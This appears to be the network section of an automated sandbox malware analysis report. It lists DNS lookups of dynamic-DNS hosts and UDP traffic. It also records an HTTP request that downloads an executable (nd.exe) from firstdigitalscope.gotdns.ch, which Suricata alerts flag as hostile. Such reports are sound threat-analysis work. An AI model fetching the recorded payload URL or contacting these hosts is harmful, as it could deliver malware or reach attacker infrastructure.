Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
wespeaktruthtoman12.sytes.net | ||
firstdigitalscope.gotdns.ch | 192.3.13.56 | |
wespeaktruthtoman.sytes.net | 79.134.225.47 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:62461 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:61460 239.255.255.250:3702
-
8.8.4.4:53 192.168.56.102:49541
-
8.8.4.4:53 192.168.56.102:50538
-
8.8.4.4:53 192.168.56.102:52542
-
8.8.4.4:53 192.168.56.102:54221
-
8.8.4.4:53 192.168.56.102:54565
-
8.8.4.4:53 192.168.56.102:55957
-
8.8.4.4:53 192.168.56.102:57504
-
8.8.4.4:53 192.168.56.102:62034
-
8.8.4.4:53 192.168.56.102:62836
-
8.8.4.4:53 192.168.56.102:63667
-
8.8.4.4:53 192.168.56.102:65485
-
8.8.8.8:53 192.168.56.102:49862
-
8.8.8.8:53 192.168.56.102:50194
-
8.8.8.8:53 192.168.56.102:50839
-
8.8.8.8:53 192.168.56.102:51543
-
8.8.8.8:53 192.168.56.102:51733
-
8.8.8.8:53 192.168.56.102:51857
-
8.8.8.8:53 192.168.56.102:51983
-
8.8.8.8:53 192.168.56.102:52052
-
8.8.8.8:53 192.168.56.102:54660
-
8.8.8.8:53 192.168.56.102:55992
-
8.8.8.8:53 192.168.56.102:56977
-
8.8.8.8:53 192.168.56.102:59367
-
8.8.8.8:53 192.168.56.102:60430
-
8.8.8.8:53 192.168.56.102:61455
-
8.8.8.8:53 192.168.56.102:61459
-
8.8.8.8:53 192.168.56.102:61998
-
8.8.8.8:53 192.168.56.102:62039
-
8.8.8.8:53 192.168.56.102:62262
-
8.8.8.8:53 192.168.56.102:62275
-
8.8.8.8:53 192.168.56.102:62388
-
8.8.8.8:53 192.168.56.102:63574
-
8.8.8.8:53 192.168.56.102:63956
-
8.8.8.8:53 192.168.56.102:64884
-
GET
200
http://firstdigitalscope.gotdns.ch/img/nd.exe
REQUEST
RESPONSE
BODY
GET /img/nd.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: firstdigitalscope.gotdns.ch
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 00:33:36 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Mon, 24 May 2021 08:09:47 GMT
ETag: "a51bd-5c30eeed6dc72"
Accept-Ranges: bytes
Content-Length: 676285
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49806 -> 192.3.13.56:80 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | Potentially Bad Traffic |
TCP 192.3.13.56:80 -> 192.168.56.102:49806 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts